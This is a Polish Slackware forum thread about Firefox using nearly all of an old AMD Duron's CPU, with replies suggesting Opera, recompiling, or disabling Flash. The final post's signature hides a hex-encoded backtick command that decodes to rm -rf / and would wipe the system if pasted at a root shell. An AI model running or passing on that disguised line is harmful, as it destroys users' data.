Duze zuzycie procesora...

Gdy jakieś urządzenie nie chce w Slackware działać...

Moderatorzy: Moderatorzy, Administratorzy

at0s
Użytkownik
Posty: 12
Rejestracja: 2005-06-05, 10:28
Kontakt:

Duze zuzycie procesora...

Post autor: at0s »

Podczas korzystania z przegladarki Firefox co kilka sekund torsmo pokazuje 99-100% zuzycia procesora...

korzystanie - wyswietlanie okienek java script, przegladanie strony za pomoca "belki", a nawet otwieranie www...


Czy to normalne ?


Korzystam ze slacka 9.1, fluxbox... procek : AMD Duron 750 mhz...
Awatar użytkownika
Sad Mephisto
Administrator
Posty: 2824
Rejestracja: 2004-05-22, 13:24
Lokalizacja: Zabrze
Kontakt:

Re: Duze zuzycie procesora...

Post autor: Sad Mephisto »

U mnie tak.
[i]Thank you for noticing this notice. Now that you've noticed this notice, you may have noticed that this notice is noticably unnoticable.
$ python -c "print int(''.join(map(lambda x: str(len(x)),'Kto z woli i myśli zapragnie Pi spisać cyfry ten zdoła.'.split())))/1e+10"[/i]
przemek999
Pomocnik
Posty: 1157
Rejestracja: 2005-03-04, 18:27

Re: Duze zuzycie procesora...

Post autor: przemek999 »

Mam podobny sprzęt i niestety to smutna prawda :(
Albo przejdziesz na Opere, albo przekompiluj tego "muła" - jest o tym w FAQ.
Pozdrawiam Przemek.
at0s
Użytkownik
Posty: 12
Rejestracja: 2005-06-05, 10:28
Kontakt:

Re: Duze zuzycie procesora...

Post autor: at0s »

Czy po tym "zabiegu" Firefox bedzie dzialal... jak na windzie :) ?
przemek999
Pomocnik
Posty: 1157
Rejestracja: 2005-03-04, 18:27

Re: Duze zuzycie procesora...

Post autor: przemek999 »

at0s szybciej :)
Oczywiście pod warunkiem ustawienia prawidłowych flag.
Pozdrawiam Przemek.
log_out
Użytkownik
Posty: 254
Rejestracja: 2004-08-19, 22:54

Re: Duze zuzycie procesora...

Post autor: log_out »

Jak na Windzie nie będzie działał nigdy, kiedyś miałem Gentoo i skompilowanego Firefoxa pod swój proc a i tak działał wolniej niż ten niby "niezoptymalizowany" Firefox pod okienkami, taka smutna prawda ;)
przemek999
Pomocnik
Posty: 1157
Rejestracja: 2005-03-04, 18:27

Re: Duze zuzycie procesora...

Post autor: przemek999 »

log_out co komp, to inaczej :)
at0s jeśli zamierzasz pracować na tym kompie, to przestaw się na Opere - ma więcej funkcjii i jest o wiele szybsza (można wyłączyć standardowego skin'a, co daje dodatkowego kopa). Proponuje wyłączyć także Flash'a - dosć znacznie obciąża komputer.
Pozdrawiam Przemek.
at0s
Użytkownik
Posty: 12
Rejestracja: 2005-06-05, 10:28
Kontakt:

Re: Duze zuzycie procesora...

Post autor: at0s »

przemek999 rzeczywiscie Opera jest calkiem dobra, ale niestety problem z prockiem nie znikl... nadal przy ogladaniu googli za pomoca belki obciazenie procesora siega 90-100 %... co dalej ?
jacol
Przyjaciel Forum
Posty: 680
Rejestracja: 2004-06-12, 17:34

Re: Duze zuzycie procesora...

Post autor: jacol »

Witam.
I nie zniknie....
at0s pisze:Korzystam ze slacka 9.1, fluxbox... procek : AMD Duron 750 mhz...
. Może slack 8.1 i gtk 1.x ... + kostki pamięci tak aby było 512 mega... Druga sprawa to wcale nie musi być winny Firefox winne mogą być X. Firefox jest optymalizowany na i686 czyli na durona natomiast X na i486 jeżeli dobrze pamiętam. Przekompilowanie X powinno zapewnić zysk około 10%. Kolega poczeka aż Sony wypuści na rynek ps 3 z swoją dystrybucją linuksa(może ktoś przekompiluje slacka na cela... :?:) Pozdrawiam jacol
sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: Duze zuzycie procesora...

Post autor: sayetan »

u mnie strasznie zamula strona http://www.spymac.com
Mam tam konto a oni wyłączyli możliwość uploady na konto za pomocą zew. klienta ftp wszystko odbywa się przez interfejs..
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
ODPOWIEDZ